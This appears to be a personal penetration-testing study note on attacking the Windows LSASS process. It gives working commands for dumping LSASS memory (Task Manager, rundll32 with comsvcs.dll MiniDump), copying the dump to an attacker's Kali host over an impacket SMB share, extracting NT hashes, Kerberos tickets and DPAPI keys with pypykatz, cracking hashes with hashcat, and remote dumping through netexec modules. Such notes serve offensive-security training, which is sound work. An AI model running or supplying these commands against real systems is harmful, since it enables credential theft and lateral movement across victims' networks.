9 - Attacking LSASS

# LSASS Introduction - LSASS is a core Windows process responsible for enforcing security policies, handling user authentication, and storing sensitive credential material in memory - Upon initial logon, LSASS will: - Cache credentials locally in memory - Create [access tokens](https://docs.microsoft.com/en-us/windows/win32/secauthz/access-tokens) - Enforce security policies - Write to Windows' [security log](https://docs.microsoft.com/en-us/windows/win32/eventlog/event-logging-security) # Dumping LSASS process memory ## Task Manager Method - When we have interactive GUI access to the target: 1. Open `Task Manager` 2. Select the `Processes` tab 3. Find and right click the `Local Security Authority Process` 4. Select `Create dump file` named `lsass.dmp` saved in `%temp%` 5. Transfer to Kali host for manipulation ![[images/Pasted image 20251008084452.png]] ## Rundll32.exe & Comsvcs.dll Method - Use `rundll32.exe` utility within CMD to dump LSASS process memory - First, identify PID for `LSASS.exe` - Second, dump to file using `rundll32.exe` ```cmd #finding LSASS PID with CMD tasklist /svc rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump <PID> lsass.dmp full ``` ```powershell #finding LSASS PID with PS Get-Process lsass rundll32 C:\windows\system32\comsvcs.dll, MiniDump <PID> C:\lsass.dmp full ``` ![[images/Pasted image 20251008100531.png]] # Move lsass.dmp to Kali host ```bash #setup smb share on Kali host sudo impacket-smbserver share -smb2support /home/jacob/ #create smb share named "share" at given path ``` ```powershell #move lsass.dmp to Kali host move lsass.dmp \\<kali_host_ip>\share ``` ![[images/Pasted image 20251008100549.png]] # Using Pypykatz to extract creds from lsass.dmp file - `Mimikatz` only runs on Windows systems, so to use it, we would either need to use a Windows attack host or we would need to run `Mimikatz` directly on the target - `Pypykatz` is an implementation of `Mimikatz` written entirely in Python - This makes `Pypykatz` an appealing alternative because all we need is a copy of the dump file on our Kali host, and we can extract creds from the dump file offline ```bash #after moving lsass.dmp to Kali host, run pypykatz pypykatz lsa minidump /path/lsass.dmp ``` - Info output on a per logon-session after extracting `lsass.dmp` with `pypykatz`: - **MSV**: authentication package in Windows that LSA calls on to validate logon attempts against the SAM database - `SID`, `Username`, `Domain`, and even the `NT` & `SHA1` password hashes for users - **WDIGEST**: older authentication protocol enabled by default in `Windows XP` - `Windows 8` and `Windows Server 2003` - `Windows Server 2012` - LSASS caches credentials used by WDIGEST in clear-text - **Kerberos**: network authentication protocol used by Active Directory in Windows Domain environments - LSASS caches `passwords`, `ekeys`, `tickets`, and `pins` associated with Kerberos; possible to extract these from LSASS process memory and use them to access other systems joined to the same domain - **DPAPI**: masterkeys are extracted for logged-on users whose data is present in LSASS process memory - Masterkeys can then be used to decrypt the secrets associated with each of the applications using DPAPI and result in the capturing of credentials for various accounts ## Crack NT hash for user from MSV info ```bash sudo hashcat -m 1000 '<hash>' /usr/share/wordlists/rockyou.txt ``` ![[images/Pasted image 20251008100824.png]] # Use Netexec ```bash netexec smb <target_ip> -u <username> -p <password> -M lsassy netexec smb <target_ip> -u <username> -p <password> -M mimikatz netexec smb <target_ip> -u <username> -p <password> -M procdump ```